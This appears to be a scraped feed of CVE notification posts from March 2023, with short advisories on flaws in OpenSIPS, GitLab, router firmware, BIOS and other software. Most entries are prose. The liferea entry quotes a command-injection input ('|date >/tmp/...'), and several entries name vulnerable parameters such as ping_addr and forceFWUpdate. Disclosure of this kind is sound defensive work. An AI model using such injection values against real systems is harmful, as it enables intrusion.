🚨 CVE-2022-34377Dell PowerEdge BIOS and Dell Precision BIOS contain an Improper SMM communication buffer verification vulnerability. A local malicious user with high Privileges may potentially exploit this vulnerability to perform arbitrary code execution or cause denial of service.🎖@cveNotify |
|
| 2023-03-16 15:29:54 |
🚨 CVE-2023-25267An issue was discovered in GFI Kerio Connect 9.4.1 patch 1 (fixed in 10.0.0). There is a stack-based Buffer Overflow in the webmail component's 2FASetup function via an authenticated request with a long primaryEMailAddress field to the webmail/api/jsonrpc URI.🎖@cveNotify |
|
| 2023-03-16 15:29:53 |
🚨 CVE-2023-27601OpenSIPS is a Session Initiation Protocol (SIP) server implementation. Prior to versions 3.1.7 and 3.2.4, OpenSIPS crashes when a malformed SDP body is received and is processed by the `delete_sdp_line` function in the sipmsgops module. This issue can be reproduced by calling the function with an SDP body that does not terminate by a line feed (i.e. `\n`). The vulnerability was found while performing black-box fuzzing against an OpenSIPS server running a configuration that made use of the functions `codec_delete_except_re` and `codec_delete_re`. The same issue was also discovered while performing coverage guided fuzzing on the function `codec_delete_except_re`. The crash happens because the function `delete_sdp_line` expects that an SDP line is terminated by a line feed (`\n`): By abusing this vulnerability, an attacker is able to crash the server. It affects configurations containing functions that rely on the affected code, such as the function `codec_delete_except_re`. Due to the sanity check that is performed in the `del_lump` function, exploitation of this issue will generate an `abort` in the lumps processing function, resulting in a Denial of Service. This issue has been fixed in versions 3.1.7 and 3.2.4.🎖@cveNotify |
|
| 2023-03-16 15:29:52 |
🚨 CVE-2023-28095OpenSIPS is a Session Initiation Protocol (SIP) server implementation. Versions prior to 3.1.7 and 3.2.4 have a potential issue in `msg_translator.c:2628` which might lead to a server crash. This issue was found while fuzzing the function `build_res_buf_from_sip_req` but could not be reproduced against a running instance of OpenSIPS. This issue could not be exploited against a running instance of OpenSIPS since no public function was found to make use of this vulnerable code. Even in the case of exploitation through unknown vectors, it is highly unlikely that this issue would lead to anything other than Denial of Service. This issue has been fixed in versions 3.1.7 and 3.2.4.🎖@cveNotify |
|
| 2023-03-16 15:29:51 |
🚨 CVE-2023-28096OpenSIPS, a Session Initiation Protocol (SIP) server implementation, has a memory leak starting in the 2.3 branch and priot to versions 3.1.8 and 3.2.5. The memory leak was detected in the function `parse_mi_request` while performing coverage-guided fuzzing. This issue can be reproduced by sending multiple requests of the form `{"jsonrpc": "2.0","method": "log_le`. This malformed message was tested against an instance of OpenSIPS via FIFO transport layer and was found to increase the memory consumption over time. To abuse this memory leak, attackers need to reach the management interface (MI) which typically should only be exposed on trusted interfaces. In cases where the MI is exposed to the internet without authentication, abuse of this issue will lead to memory exhaustion which may affect the underlying system’s availability. No authentication is typically required to reproduce this issue. On the other hand, memory leaks may occur in other areas of OpenSIPS where the cJSON library is used for parsing JSON objects. The issue has been fixed in versions 3.1.8 and 3.2.5.🎖@cveNotify |
|
| 2023-03-16 15:29:47 |
🚨 CVE-2022-4313A vulnerability was reported where through modifying the scan variables, an authenticated user in Tenable products, that has Scan Policy Configuration roles, could manipulate audit policy variables to execute arbitrary commands on credentialed scan targets.🎖@cveNotify |
|
| 2023-03-16 15:29:46 |
🚨 CVE-2023-1421A reflected cross-site scripting vulnerability in the OAuth flow completion endpoints in Mattermost allows an attacker to send AJAX requests on behalf of the victim via sharing a crafted link with a malicious state parameter.🎖@cveNotify |
|
| 2023-03-16 15:29:45 |
🚨 CVE-2023-24468Broken access control in Advanced Authentication versions prior to 6.4.1.1 and 6.3.7.2🎖@cveNotify |
|
| 2023-03-16 15:29:44 |
🚨 CVE-2023-28097OpenSIPS is a Session Initiation Protocol (SIP) server implementation. Prior to versions 3.1.9 and 3.2.6, a malformed SIP message containing a large _Content-Length_ value and a specially crafted Request-URI causes a segmentation fault in OpenSIPS. This issue occurs when a large amount of shared memory using the `-m` flag was allocated to OpenSIPS, such as 10 GB of RAM. On the test system, this issue occurred when shared memory was set to `2362` or higher. This issue is fixed in versions 3.1.9 and 3.2.6. The only workaround is to guarantee that the Content-Length value of input messages is never larger than `2147483647`.🎖@cveNotify |
|
| 2023-03-16 15:29:40 |
🚨 CVE-2023-28098OpenSIPS is a Session Initiation Protocol (SIP) server implementation. Prior to versions 3.1.7 and 3.2.4, a specially crafted Authorization header causes OpenSIPS to crash or behave in an unexpected way due to a bug in the function `parse_param_name()` . This issue was discovered while performing coverage guided fuzzing of the function parse_msg. The AddressSanitizer identified that the issue occurred in the function `q_memchr()` which is being called by the function `parse_param_name()`. This issue may cause erratic program behaviour or a server crash. It affects configurations containing functions that make use of the affected code, such as the function `www_authorize()` . Versions 3.1.7 and 3.2.4 contain a fix.🎖@cveNotify |
|
| 2023-03-16 15:29:39 |
🚨 CVE-2023-28099OpenSIPS is a Session Initiation Protocol (SIP) server implementation. Prior to versions 3.1.9 and 3.2.6, if `ds_is_in_list()` is used with an invalid IP address string (`NULL` is illegal input), OpenSIPS will attempt to print a string from a random address (stack garbage), which could lead to a crash. All users of `ds_is_in_list()` without the `$si` variable as 1st parameter could be affected by this vulnerability to a larger, lesser or no extent at all, depending if the data passed to the function is a valid IPv4 or IPv6 address string or not. Fixes will are available starting with the 3.1.9 and 3.2.6 minor releases. There are no known workarounds.🎖@cveNotify |
|
| 2023-03-16 15:29:38 |
🚨 CVE-2023-28337When uploading a firmware image to a Netgear Nighthawk Wifi6 Router (RAX30), a hidden “forceFWUpdate” parameter may be provided to force the upgrade to complete and bypass certain validation checks. End users can use this to upload modified, unofficial, and potentially malicious firmware to the device.🎖@cveNotify |
|
| 2023-03-16 15:29:37 |
🚨 CVE-2022-46773IBM Robotic Process Automation 21.0.0 - 21.0.7 and 23.0.0 is vulnerable to client-side validation bypass for credential pools. Invalid credential pools may be created as a result. IBM X-Force ID: 242951.🎖@cveNotify |
|
| 2023-03-16 12:29:36 |
🚨 CVE-2023-24571Dell BIOS contains an Improper Input Validation vulnerability. A local authenticated malicious user with administrator privileges could potentially exploit this vulnerability to perform arbitrary code execution.🎖@cveNotify |
|
| 2023-03-16 10:29:38 |
🚨 CVE-2022-1586An out-of-bounds read vulnerability was discovered in the PCRE2 library in the compile_xclass_matchingpath() function of the pcre2_jit_compile.c file. This involves a unicode property matching issue in JIT-compiled regular expressions. The issue occurs because the character was not fully read in case-less matching within JIT.🎖@cveNotify |
|
| 2023-03-16 10:29:37 |
🚨 CVE-2022-1587An out-of-bounds read vulnerability was discovered in the PCRE2 library in the get_recurse_data_length() function of the pcre2_jit_compile.c file. This issue affects recursions in JIT-compiled regular expressions caused by duplicate data transfers.🎖@cveNotify |
|
| 2023-03-16 10:29:36 |
🚨 CVE-2019-20454An out-of-bounds read was discovered in PCRE before 10.34 when the pattern \X is JIT compiled and used to match specially crafted subjects in non-UTF mode. Applications that use PCRE to parse untrusted input may be vulnerable to this flaw, which would allow an attacker to crash the application. The flaw occurs in do_extuni_no_utf in pcre2_jit_compile.c.🎖@cveNotify |
|
| 2023-03-16 06:29:47 |
🚨 CVE-2023-27084Permissions vulnerability found in isoftforce Dreamer CMS v.4.0.1 allows local attackers to obtain sensitive information via the AttachmentController parameter.🎖@cveNotify |
|
| 2023-03-16 06:29:46 |
🚨 CVE-2023-27095Insecure Permissions vulnerability found in OpenGoofy Hippo4j v.1.4.3 allows attacker toescalate privileges via the AddUser method of the UserController function in Tenant Management module.🎖@cveNotify |
|
| 2023-03-16 06:29:44 |
🚨 CVE-2023-25280OS Command injection vulnerability in D-Link DIR820LA1_FW105B03 allows attackers to escalate privileges to root via a crafted payload with the ping_addr parameter to ping.ccp.🎖@cveNotify |
|
| 2023-03-16 06:29:40 |
🚨 CVE-2023-25281A stack overflow vulnerability exists in pingV4Msg component in D-Link DIR820LA1_FW105B03, allows attackers to cause a denial of service via the nextPage parameter to ping.ccp.🎖@cveNotify |
|
| 2023-03-16 06:29:39 |
🚨 CVE-2023-28486Sudo before 1.9.13 does not escape control characters in log messages.🎖@cveNotify |
|
| 2023-03-16 06:29:38 |
🚨 CVE-2023-28487Sudo before 1.9.13 does not escape control characters in sudoreplay output.🎖@cveNotify |
|
| 2023-03-16 06:29:37 |
🚨 CVE-2023-28466do_tls_getsockopt in net/tls/tls_main.c in the Linux kernel through 6.2.6 lacks a lock_sock call, leading to a race condition (with a resultant use-after-free or NULL pointer dereference).🎖@cveNotify |
|
| 2023-03-16 00:29:58 |
🚨 CVE-2022-4313A vulnerability was reported where through modifying the scan variables, an authenticated user in Tenable products, that has Scan Policy Configuration roles, could manipulate audit policy variables to execute arbitrary commands on credentialed scan targets.🎖@cveNotify |
|
| 2023-03-16 00:29:54 |
🚨 CVE-2023-1389TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 contained a command injection vulnerability in the country form of the /cgi-bin/luci;stok=/locale endpoint on the web management interface. Specifically, the country parameter of the write operation was not sanitized before being used in a call to popen(), allowing an unauthenticated attacker to inject commands, which would be run as root, with a simple POST request.🎖@cveNotify |
|
| 2023-03-16 00:29:53 |
🚨 CVE-2023-1421A reflected cross-site scripting vulnerability in the OAuth flow completion endpoints in Mattermost allows an attacker to send AJAX requests on behalf of the victim via sharing a crafted link with a malicious state parameter.🎖@cveNotify |
|
| 2023-03-16 00:29:52 |
🚨 CVE-2023-24468Broken access control in Advanced Authentication versions prior to 6.4.1.1 and 6.3.7.2🎖@cveNotify |
|
| 2023-03-16 00:29:51 |
🚨 CVE-2023-28097OpenSIPS is a Session Initiation Protocol (SIP) server implementation. Prior to versions 3.1.9 and 3.2.6, a malformed SIP message containing a large _Content-Length_ value and a specially crafted Request-URI causes a segmentation fault in OpenSIPS. This issue occurs when a large amount of shared memory using the `-m` flag was allocated to OpenSIPS, such as 10 GB of RAM. On the test system, this issue occurred when shared memory was set to `2362` or higher. This issue is fixed in versions 3.1.9 and 3.2.6. The only workaround is to guarantee that the Content-Length value of input messages is never larger than `2147483647`.🎖@cveNotify |
|
| 2023-03-16 00:29:50 |
🚨 CVE-2023-28098OpenSIPS is a Session Initiation Protocol (SIP) server implementation. Prior to versions 3.1.7 and 3.2.4, a specially crafted Authorization header causes OpenSIPS to crash or behave in an unexpected way due to a bug in the function `parse_param_name()` . This issue was discovered while performing coverage guided fuzzing of the function parse_msg. The AddressSanitizer identified that the issue occurred in the function `q_memchr()` which is being called by the function `parse_param_name()`. This issue may cause erratic program behaviour or a server crash. It affects configurations containing functions that make use of the affected code, such as the function `www_authorize()` . Versions 3.1.7 and 3.2.4 contain a fix.🎖@cveNotify |
|
| 2023-03-16 00:29:46 |
🚨 CVE-2023-28337When uploading a firmware image to a Netgear Nighthawk Wifi6 Router (RAX30), a hidden “forceFWUpdate” parameter may be provided to force the upgrade to complete and bypass certain validation checks. End users can use this to upload modified, unofficial, and potentially malicious firmware to the device.🎖@cveNotify |
|
| 2023-03-16 00:29:45 |
🚨 CVE-2023-28338Any request send to a Netgear Nighthawk Wifi6 Router (RAX30)'s web service containing a “Content-Type” of “multipartboundary=” will result in the request body being written to “/tmp/mulipartFile” on the device itself. A sufficiently large file will cause device resources to be exhausted, resulting in the device becoming unusable until it is rebooted.🎖@cveNotify |
|
| 2023-03-16 00:29:44 |
🚨 CVE-2023-28460A command injection vulnerability was discovered in Array Networks APV products. A remote attacker can send a crafted packet after logging into the affected appliance as an administrator, resulting in arbitrary shell code execution. This is fixed in 8.6.1.262 or newer and 10.4.2.93 or newer.🎖@cveNotify |
|
| 2023-03-16 00:29:43 |
🚨 CVE-2023-28461Array Networks Array AG Series and vxAG (9.4.0.481 and earlier) allow remote code execution. An attacker can browse the filesystem on the SSL VPN gateway using a flags attribute in an HTTP header without authentication. The product could then be exploited through a vulnerable URL. The 2023-03-09 vendor advisory stated "a new Array AG release with the fix will be available soon."🎖@cveNotify |
|
| 2023-03-16 00:29:39 |
🚨 CVE-2023-25267An issue was discovered in GFI Kerio Connect 9.4.1 patch 1 (fixed in 10.0.0). There is a stack-based Buffer Overflow in the webmail component's 2FASetup function via an authenticated request with a long primaryEMailAddress field to the webmail/api/jsonrpc URI.🎖@cveNotify |
|
| 2023-03-16 00:29:38 |
🚨 CVE-2023-27600OpenSIPS is a Session Initiation Protocol (SIP) server implementation. Prior to versions 3.1.7 and 3.2.4, OpenSIPS crashes when a malformed SDP body is received and is processed by the `delete_sdp_line` function in the sipmsgops module. This issue can be reproduced by calling the function with an SDP body that does not terminate by a line feed (i.e. `\n`). The vulnerability was found while performing black-box fuzzing against an OpenSIPS server running a configuration that made use of the functions `codec_delete_except_re` and `codec_delete_re`. The same issue was also discovered while performing coverage guided fuzzing on the function `codec_delete_except_re`. The crash happens because the function `delete_sdp_line` expects that an SDP line is terminated by a line feed (`\n`). By abusing this vulnerability, an attacker is able to crash the server. It affects configurations containing functions that rely on the affected code, such as the function `codec_delete_except_re`. Due to the sanity check that is performed in the `del_lump` function, exploitation of this issue will generate an `abort` in the lumps processing function, resulting in a Denial of Service. This issue is patched in versions 3.1.7 and 3.2.4.🎖@cveNotify |
|
| 2023-03-16 00:29:37 |
🚨 CVE-2023-27601OpenSIPS is a Session Initiation Protocol (SIP) server implementation. Prior to versions 3.1.7 and 3.2.4, OpenSIPS crashes when a malformed SDP body is received and is processed by the `delete_sdp_line` function in the sipmsgops module. This issue can be reproduced by calling the function with an SDP body that does not terminate by a line feed (i.e. `\n`). The vulnerability was found while performing black-box fuzzing against an OpenSIPS server running a configuration that made use of the functions `codec_delete_except_re` and `codec_delete_re`. The same issue was also discovered while performing coverage guided fuzzing on the function `codec_delete_except_re`. The crash happens because the function `delete_sdp_line` expects that an SDP line is terminated by a line feed (`\n`): By abusing this vulnerability, an attacker is able to crash the server. It affects configurations containing functions that rely on the affected code, such as the function `codec_delete_except_re`. Due to the sanity check that is performed in the `del_lump` function, exploitation of this issue will generate an `abort` in the lumps processing function, resulting in a Denial of Service. This issue has been fixed in versions 3.1.7 and 3.2.4.🎖@cveNotify |
|
| 2023-03-16 00:29:36 |
🚨 CVE-2023-28096OpenSIPS, a Session Initiation Protocol (SIP) server implementation, has a memory leak starting in the 2.3 branch and priot to versions 3.1.8 and 3.2.5. The memory leak was detected in the function `parse_mi_request` while performing coverage-guided fuzzing. This issue can be reproduced by sending multiple requests of the form `{"jsonrpc": "2.0","method": "log_le`. This malformed message was tested against an instance of OpenSIPS via FIFO transport layer and was found to increase the memory consumption over time. To abuse this memory leak, attackers need to reach the management interface (MI) which typically should only be exposed on trusted interfaces. In cases where the MI is exposed to the internet without authentication, abuse of this issue will lead to memory exhaustion which may affect the underlying system’s availability. No authentication is typically required to reproduce this issue. On the other hand, memory leaks may occur in other areas of OpenSIPS where the cJSON library is used for parsing JSON objects. The issue has been fixed in versions 3.1.8 and 3.2.5.🎖@cveNotify |
|
| 2023-03-15 23:29:58 |
🚨 CVE-2023-22591IBM Robotic Process Automation 21.0.1 through 21.0.7 and 23.0.0 through 23.0.1 could allow a user with physical access to the system due to session tokens for not being invalidated after a password reset. IBM X-Force ID: 243710.🎖@cveNotify |
|
| 2023-03-15 23:29:57 |
🚨 CVE-2023-26484KubeVirt is a virtual machine management add-on for Kubernetes. In versions 0.59.0 and prior, if a malicious user has taken over a Kubernetes node where virt-handler (the KubeVirt node-daemon) is running, the virt-handler service account can be used to modify all node specs. This can be misused to lure-in system-level-privileged components which can, for instance, read all secrets on the cluster, or can exec into pods on other nodes. This way, a compromised node can be used to elevate privileges beyond the node until potentially having full privileged access to the whole cluster. The simplest way to exploit this, once a user could compromise a specific node, is to set with the virt-handler service account all other nodes to unschedulable and simply wait until system-critical components with high privileges appear on its node. No patches are available as of time of publication. As a workaround, gatekeeper users can add a webhook which will block the `virt-handler` service account to modify the spec of a node.🎖@cveNotify |
|
| 2023-03-15 23:29:56 |
🚨 CVE-2023-27596OpenSIPS is a Session Initiation Protocol (SIP) server implementation. Prior to versions 3.1.8 and 3.2.5, OpenSIPS crashes when a malformed SDP body is sent multiple times to an OpenSIPS configuration that makes use of the `stream_process` function. This issue was discovered during coverage guided fuzzing of the function `codec_delete_except_re`. By abusing this vulnerability, an attacker is able to crash the server. It affects configurations containing functions that rely on the affected code, such as the function `codec_delete_except_re`. This issue has been fixed in version 3.1.8 and 3.2.5.🎖@cveNotify |
|
| 2023-03-15 23:29:55 |
🚨 CVE-2023-27597OpenSIPS is a Session Initiation Protocol (SIP) server implementation. Prior to versions 3.1.8 and 3.2.5, when a specially crafted SIP message is processed by the function `rewrite_ruri`, a crash occurs due to a segmentation fault. This issue causes the server to crash. It affects configurations containing functions that make use of the affected code, such as the function `setport`. This issue has been fixed in version 3.1.8 and 3.2.5.🎖@cveNotify |
|
| 2023-03-15 23:29:52 |
🚨 CVE-2023-27598OpenSIPS is a Session Initiation Protocol (SIP) server implementation. Prior to versions 3.1.7 and 3.2.4, sending a malformed `Via` header to OpenSIPS triggers a segmentation fault when the function `calc_tag_suffix` is called. A specially crafted `Via` header, which is deemed correct by the parser, will pass uninitialized strings to the function `MD5StringArray` which leads to the crash. Abuse of this vulnerability leads to Denial of Service due to a crash. Since the uninitialized string points to memory location `0x0`, no further exploitation appears to be possible. No special network privileges are required to perform this attack, as long as the OpenSIPS configuration makes use of functions such as `sl_send_reply` or `sl_gen_totag` that trigger the vulnerable code. This issue has been fixed in versions 3.1.7 and 3.2.4.🎖@cveNotify |
|
| 2023-03-15 23:29:51 |
🚨 CVE-2023-27599OpenSIPS is a Session Initiation Protocol (SIP) server implementation. Prior to versions 3.1.7 and 3.2.4, when the function `append_hf` handles a SIP message with a malformed To header, a call to the function `abort()` is performed, resulting in a crash. This is due to the following check in `data_lump.c:399` in the function `anchor_lump`. An attacker abusing this vulnerability will crash OpenSIPS leading to Denial of Service. It affects configurations containing functions that make use of the affected code, such as the function `append_hf`. This issue has been fixed in versions 3.1.7 and 3.2.4.🎖@cveNotify |
|
| 2023-03-15 23:29:50 |
🚨 CVE-2023-28450An issue was discovered in Dnsmasq before 2.90. The default maximum EDNS.0 UDP packet size was set to 4096 but should be 1232 because of DNS Flag Day 2020.🎖@cveNotify |
|
| 2023-03-15 23:29:49 |
🚨 CVE-2023-1355NULL Pointer Dereference in GitHub repository vim/vim prior to 9.0.1402.🎖@cveNotify |
|
| 2023-03-15 23:29:45 |
🚨 CVE-2023-1353A vulnerability, which was classified as problematic, was found in SourceCodester Design and Implementation of Covid-19 Directory on Vaccination System 1.0. Affected is an unknown function of the file verification.php. The manipulation of the argument txtvaccinationID leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-222852.🎖@cveNotify |
|
| 2023-03-15 23:29:44 |
🚨 CVE-2022-33244Transient DOS due to reachable assertion in modem during MIB reception and SIB timeout🎖@cveNotify |
|
| 2023-03-15 23:29:43 |
🚨 CVE-2020-27507The Kamailio SIP before 5.5.0 server mishandles INVITE requests with duplicated fields and overlength tag, leading to a buffer overflow that crashes the server or possibly have unspecified other impact.🎖@cveNotify |
|
| 2023-03-15 23:29:42 |
🚨 CVE-2022-46773IBM Robotic Process Automation 21.0.0 - 21.0.7 and 23.0.0 is vulnerable to client-side validation bypass for credential pools. Invalid credential pools may be created as a result. IBM X-Force ID: 242951.🎖@cveNotify |
|
| 2023-03-15 23:29:39 |
🚨 CVE-2023-25344An issue was discovered in swig-templates thru 2.0.4 and swig thru 1.4.2, allows attackers to execute arbitrary code via crafted Object.prototype anonymous function.🎖@cveNotify |
|
| 2023-03-15 23:29:38 |
🚨 CVE-2023-25345Directory traversal vulnerability in swig-templates thru 2.0.4 and swig thru 1.4.2, allows attackers to read arbitrary files via the include or extends tags.🎖@cveNotify |
|
| 2023-03-15 23:29:37 |
🚨 CVE-2023-26912Cross site scripting (XSS) vulnerability in xenv S-mall-ssm thru commit 3d9e77f7d80289a30f67aaba1ae73e375d33ef71 on Feb 17, 2020, allows local attackers to execute arbitrary code via the evaluate button.🎖@cveNotify |
|
| 2023-03-15 23:29:36 |
🚨 CVE-2023-27903Jenkins 2.393 and earlier, LTS 2.375.3 and earlier creates a temporary file in the default temporary directory with the default permissions for newly created files when uploading a file parameter through the CLI, potentially allowing attackers with access to the Jenkins controller file system to read and write the file before it is used.🎖@cveNotify |
|
| 2023-03-15 21:29:57 |
🚨 CVE-2022-43874IBM App Connect Enterprise Certified Container 4.1, 4.2, 5.0, 5.1, 5.2, 6.0, 6.1, 6.2, and 7.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 239963.🎖@cveNotify |
|
| 2023-03-15 19:30:00 |
🚨 CVE-2022-33272Transient DOS in modem due to reachable assertion.🎖@cveNotify |
|
| 2023-03-15 19:29:59 |
🚨 CVE-2023-1352A vulnerability, which was classified as critical, has been found in SourceCodester Design and Implementation of Covid-19 Directory on Vaccination System 1.0. This issue affects some unknown processing of the file /admin/login.php. The manipulation of the argument txtusername/txtpassword leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-222851.🎖@cveNotify |
|
| 2023-03-15 19:29:58 |
🚨 CVE-2023-1351A vulnerability classified as critical has been found in SourceCodester Computer Parts Sales and Inventory System 1.0. This affects an unknown part of the file cust_transac.php. The manipulation of the argument phonenumber leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-222849 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-15 19:29:57 |
🚨 CVE-2023-1349A vulnerability, which was classified as problematic, has been found in Hsycms 3.1. Affected by this issue is some unknown functionality of the file controller\cate.php of the component Add Category Module. The manipulation of the argument title leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-222842 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-15 19:29:56 |
🚨 CVE-2023-1350A vulnerability was found in liferea. It has been rated as critical. Affected by this issue is the function update_job_run of the file src/update.c of the component Feed Enrichment. The manipulation of the argument source with the input |date >/tmp/bad-item-link.txt leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 8d8b5b963fa64c7a2122d1bbfbb0bed46e813e59. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-222848.🎖@cveNotify |
|
| 2023-03-15 19:29:55 |
🚨 CVE-2022-33278Memory corruption due to buffer copy without checking the size of input in HLOS when input message size is larger than the buffer capacity.🎖@cveNotify |
|
| 2023-03-15 19:29:53 |
🚨 CVE-2022-33309Transient DOS due to buffer over-read in WLAN Firmware while parsing secure FTMR frame with size lesser than 39 Bytes.🎖@cveNotify |
|
| 2023-03-15 19:29:52 |
🚨 CVE-2021-2173Vulnerability in the Recovery component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows high privileged attacker having DBA Level Account privilege with network access via Oracle Net to compromise Recovery. While the vulnerability is in Recovery, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Recovery accessible data. CVSS 3.1 Base Score 4.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N).🎖@cveNotify |
|
| 2023-03-15 19:29:51 |
🚨 CVE-2022-33242Memory corruption due to improper authentication in Qualcomm IPC while loading unsigned lib in audio PD.🎖@cveNotify |
|
| 2023-03-15 19:29:50 |
🚨 CVE-2022-25655Memory corruption in WLAN HAL while arbitrary value is passed in WMI UTF command payload.🎖@cveNotify |
|
| 2023-03-15 19:29:49 |
🚨 CVE-2022-25694Memory corruption in Modem due to usage of Out-of-range pointer offset in UIM🎖@cveNotify |
|
| 2023-03-15 19:29:48 |
🚨 CVE-2022-22075Information Disclosure in Graphics during GPU context switch.🎖@cveNotify |
|
| 2023-03-15 19:29:47 |
🚨 CVE-2022-25705Memory corruption in modem due to integer overflow to buffer overflow while handling APDU response🎖@cveNotify |
|
| 2023-03-15 19:29:46 |
🚨 CVE-2022-25709Memory corruption in modem due to use of out of range pointer offset while processing qmi msg🎖@cveNotify |
|
| 2023-03-15 19:29:45 |
🚨 CVE-2022-33213Memory corruption in modem due to buffer overflow while processing a PPP packet🎖@cveNotify |
|
| 2023-03-15 19:29:44 |
🚨 CVE-2022-47474In telephony service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-03-15 19:29:43 |
🚨 CVE-2022-47475In telephony service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-03-15 19:29:41 |
🚨 CVE-2022-47476In telephony service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-03-15 19:29:40 |
🚨 CVE-2022-47478In telephony service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-03-15 17:30:09 |
🚨 CVE-2023-0100In Eclipse BIRT, starting from version 2.6.2, the default configuration allowed to retrieve a report from the same host using an absolute HTTP path for the report parameter (e.g. __report=http://xyz.com/report.rptdesign). If the host indicated in the __report parameter matched the HTTP Host header value, the report would be retrieved. However, the Host header can be tampered with on some configurations where no virtual hosts are put in place (e.g. in the default configuration of Apache Tomcat) or when the default host points to the BIRT server. This vulnerability was patched on Eclipse BIRT 4.13.🎖@cveNotify |
|
| 2023-03-15 17:30:07 |
🚨 CVE-2023-27102Libde265 v1.0.11 was discovered to contain a segmentation violation via the function decoder_context::process_slice_segment_header at decctx.cc.🎖@cveNotify |
|
| 2023-03-15 17:30:06 |
🚨 CVE-2023-27103Libde265 v1.0.11 was discovered to contain a heap buffer overflow via the function derive_collocated_motion_vectors at motion.cc.🎖@cveNotify |
|
| 2023-03-15 17:30:04 |
🚨 CVE-2023-27781jpegoptim v1.5.2 was discovered to contain a heap overflow in the optimize function at jpegoptim.c.🎖@cveNotify |
|
| 2023-03-15 17:30:02 |
🚨 CVE-2022-45155An Improper Handling of Exceptional Conditions vulnerability in obs-service-go_modules of openSUSE Factory allows attackers that can influence the call to the service to delete files and directories on the system of the victim. This issue affects: SUSE openSUSE Factory obs-service-go_modules versions prior to 0.6.1.🎖@cveNotify |
|
| 2023-03-15 17:30:01 |
🚨 CVE-2023-1072An issue has been discovered in GitLab affecting all versions starting from 9.0 before 15.7.8, all versions starting from 15.8 before 15.8.4, all versions starting from 15.9 before 15.9.2. It was possible to trigger a resource depletion attack due to improper filtering for number of requests to read commits details.🎖@cveNotify |
|
| 2023-03-15 17:29:59 |
🚨 CVE-2023-0050An issue has been discovered in GitLab affecting all versions starting from 13.7 before 15.7.8, all versions starting from 15.8 before 15.8.4, all versions starting from 15.9 before 15.9.2. A specially crafted Kroki diagram could lead to a stored XSS on the client side which allows attackers to perform arbitrary actions on behalf of victims.🎖@cveNotify |
|
| 2023-03-15 17:29:58 |
🚨 CVE-2023-26110All versions of the package node-bluetooth are vulnerable to Buffer Overflow via the findSerialPortChannel method due to improper user input length validation.🎖@cveNotify |
|
| 2023-03-15 17:29:56 |
🚨 CVE-2022-4331An issue has been discovered in GitLab EE affecting all versions starting from 15.1 before 15.7.8, all versions starting from 15.8 before 15.8.4, all versions starting from 15.9 before 15.9.2. If a group with SAML SSO enabled is transferred to a new namespace as a child group, it's possible previously removed malicious maintainer or owner of the child group can still gain access to the group via SSO or a SCIM token to perform actions on the group.🎖@cveNotify |
|
| 2023-03-15 17:29:55 |
🚨 CVE-2023-26109All versions of the package node-bluetooth-serial-port are vulnerable to Buffer Overflow via the findSerialPortChannel method due to improper user input length validation.🎖@cveNotify |
|
| 2023-03-15 17:29:53 |
🚨 CVE-2023-26957onekeyadmin v1.3.9 was discovered to contain an arbitrary file delete vulnerability via the component \admin\controller\plugins.🎖@cveNotify |
|
| 2023-03-15 17:29:52 |
🚨 CVE-2023-0839Improper Protection for Outbound Error Messages and Alert Signals vulnerability in ProMIS Process Co. InSCADA allows Account Footprinting.This issue affects inSCADA: before 20230115-1.🎖@cveNotify |
|
| 2023-03-15 17:29:50 |
🚨 CVE-2022-4289An issue has been discovered in GitLab affecting all versions starting from 15.3 before 15.7.8, versions of 15.8 before 15.8.4, and version 15.9 before 15.9.2. Google IAP details in Prometheus integration were not hidden, could be leaked from instance, group, or project settings to other users.🎖@cveNotify |
|
| 2023-03-15 17:29:49 |
🚨 CVE-2023-1084An issue has been discovered in GitLab CE/EE affecting all versions before 15.7.8, all versions starting from 15.8 before 15.8.4, all versions starting from 15.9 before 15.9.2. A malicious project Maintainer may create a Project Access Token with Owner level privileges using a crafted request.🎖@cveNotify |
|
| 2023-03-15 17:29:47 |
🚨 CVE-2023-0223An issue has been discovered in GitLab affecting all versions starting from 15.5 before 15.7.8, all versions starting from 15.8 before 15.8.4, all versions starting from 15.9 before 15.9.2. Non-project members could retrieve release descriptions via the API, even if the release visibility is restricted to project members only in the project settings.🎖@cveNotify |
|
| 2023-03-15 17:29:46 |
🚨 CVE-2023-27475Goutil is a collection of miscellaneous functionality for the go language. In versions prior to 0.6.0 when users use fsutil.Unzip to unzip zip files from a malicious attacker, they may be vulnerable to path traversal. This vulnerability is known as a ZipSlip. This issue has been fixed in version 0.6.0, users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-03-15 17:29:44 |
